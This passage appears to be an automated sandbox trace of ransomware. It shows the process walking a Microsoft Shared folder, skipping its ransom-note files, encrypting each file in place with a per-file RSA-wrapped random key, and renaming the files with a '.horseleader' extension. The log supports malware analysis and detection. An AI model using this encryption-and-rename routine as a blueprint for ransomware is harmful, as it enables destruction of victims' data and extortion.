lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.865] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.865] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.865] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x8ef6e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.865] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.868] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.869] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.869] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.869] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0226.869] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0226.869] CloseHandle (hObject=0x158) returned 1 [0226.870] GetProcessHeap () returned 0x780000 [0226.870] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0226.870] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT.horseleader") returned 83 [0226.870] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt.horseleader")) returned 1 [0226.871] GetProcessHeap () returned 0x780000 [0226.871] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0226.871] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a19600, ftCreationTime.dwHighDateTime=0x1caa4ff, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8a19600, ftLastWriteTime.dwHighDateTime=0x1caa4ff, nFileSizeHigh=0x0, nFileSizeLow=0xadf90, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="EPSIMP32.FLT", cAlternateFileName="")) returned 1 [0226.871] lstrcmpiW (lpString1="EPSIMP32.FLT", lpString2="Windows") returned -1 [0226.871] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 71 [0226.871] StrStrIW (lpFirst="EPSIMP32.FLT", lpSrch=".horseleader") returned 0x0 [0226.871] lstrcmpW (lpString1="EPSIMP32.FLT", lpString2="#Decrypt#.txt") returned 1 [0226.871] lstrcmpW (lpString1="EPSIMP32.FLT", lpString2="_uninstalling_.png") returned 1 [0226.871] lstrlenW (lpString=".testttjffg") returned 11 [0226.871] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT", lpSrch=".testttjffg") returned 0x0 [0226.871] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0226.871] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0226.871] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0226.872] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 71 [0226.872] StrStrW (lpFirst="EPSIMP32.FLT", lpSrch=".txt") returned 0x0 [0226.872] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=712592) returned 1 [0226.872] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.872] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.981] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.981] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0227.407] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x547c8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0227.407] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0227.552] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0227.552] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0227.552] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xa8f90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0227.552] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0227.554] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0227.554] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0227.555] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0227.555] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0227.555] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0227.555] CloseHandle (hObject=0x158) returned 1 [0227.556] GetProcessHeap () returned 0x780000 [0227.556] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0227.556] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT.horseleader") returned 83 [0227.556] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt.horseleader")) returned 1 [0227.557] GetProcessHeap () returned 0x780000 [0227.557] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0227.557] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a19600, ftCreationTime.dwHighDateTime=0x1caa4ff, ftLastAccessTime.dwLowDateTime=0xeedd0ad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8a19600, ftLastWriteTime.dwHighDateTime=0x1caa4ff, nFileSizeHigh=0x0, nFileSizeLow=0x4e380, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="GIFIMP32.FLT", cAlternateFileName="")) returned 1 [0227.557] lstrcmpiW (lpString1="GIFIMP32.FLT", lpString2="Windows") returned -1 [0227.557] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 71 [0227.557] StrStrIW (lpFirst="GIFIMP32.FLT", lpSrch=".horseleader") returned 0x0 [0227.557] lstrcmpW (lpString1="GIFIMP32.FLT", lpString2="#Decrypt#.txt") returned 1 [0227.557] lstrcmpW (lpString1="GIFIMP32.FLT", lpString2="_uninstalling_.png") returned 1 [0227.557] lstrlenW (lpString=".testttjffg") returned 11 [0227.557] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT", lpSrch=".testttjffg") returned 0x0 [0227.557] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0227.557] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0227.557] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0227.559] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 71 [0227.559] StrStrW (lpFirst="GIFIMP32.FLT", lpSrch=".txt") returned 0x0 [0227.559] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=320384) returned 1 [0227.559] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0227.559] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0227.992] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0227.996] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0227.996] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x249c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0227.996] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.007] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.008] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.008] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x49380, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.013] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.025] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.025] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.025] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.025] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0228.026] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0228.026] CloseHandle (hObject=0x158) returned 1 [0228.026] GetProcessHeap () returned 0x780000 [0228.026] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0228.026] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT.horseleader") returned 83 [0228.026] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt.horseleader")) returned 1 [0228.028] GetProcessHeap () returned 0x780000 [0228.028] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0228.028] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a19600, ftCreationTime.dwHighDateTime=0x1caa4ff, ftLastAccessTime.dwLowDateTime=0xeee1cd90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8a19600, ftLastWriteTime.dwHighDateTime=0x1caa4ff, nFileSizeHigh=0x0, nFileSizeLow=0x3ad80, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="JPEGIM32.FLT", cAlternateFileName="")) returned 1 [0228.028] lstrcmpiW (lpString1="JPEGIM32.FLT", lpString2="Windows") returned -1 [0228.028] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 71 [0228.028] StrStrIW (lpFirst="JPEGIM32.FLT", lpSrch=".horseleader") returned 0x0 [0228.028] lstrcmpW (lpString1="JPEGIM32.FLT", lpString2="#Decrypt#.txt") returned 1 [0228.028] lstrcmpW (lpString1="JPEGIM32.FLT", lpString2="_uninstalling_.png") returned 1 [0228.028] lstrlenW (lpString=".testttjffg") returned 11 [0228.029] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT", lpSrch=".testttjffg") returned 0x0 [0228.029] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0228.029] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0228.029] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\jpegim32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0228.030] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 71 [0228.030] StrStrW (lpFirst="JPEGIM32.FLT", lpSrch=".txt") returned 0x0 [0228.030] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=241024) returned 1 [0228.030] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.031] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.033] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.033] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.033] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x1aec0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.033] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.035] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.035] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.035] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x35d80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.035] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.037] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.037] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.037] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.037] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0228.037] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0228.038] CloseHandle (hObject=0x158) returned 1 [0228.038] GetProcessHeap () returned 0x780000 [0228.038] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0228.038] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT.horseleader") returned 83 [0228.038] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\jpegim32.flt"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\jpegim32.flt.horseleader")) returned 1 [0228.039] GetProcessHeap () returned 0x780000 [0228.039] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0228.040] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x774, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MS.CGM", cAlternateFileName="")) returned 1 [0228.040] lstrcmpiW (lpString1="MS.CGM", lpString2="Windows") returned -1 [0228.040] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 65 [0228.040] StrStrIW (lpFirst="MS.CGM", lpSrch=".horseleader") returned 0x0 [0228.040] lstrcmpW (lpString1="MS.CGM", lpString2="#Decrypt#.txt") returned 1 [0228.040] lstrcmpW (lpString1="MS.CGM", lpString2="_uninstalling_.png") returned 1 [0228.040] lstrlenW (lpString=".testttjffg") returned 11 [0228.040] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM", lpSrch=".testttjffg") returned 0x0 [0228.040] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0228.040] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0228.041] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0228.045] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 65 [0228.045] StrStrW (lpFirst="MS.CGM", lpSrch=".txt") returned 0x0 [0228.045] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1908) returned 1 [0228.045] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x774, lpOverlapped=0x0) returned 1 [0228.071] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff88c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.071] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x774, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x774, lpOverlapped=0x0) returned 1 [0228.072] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.072] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, 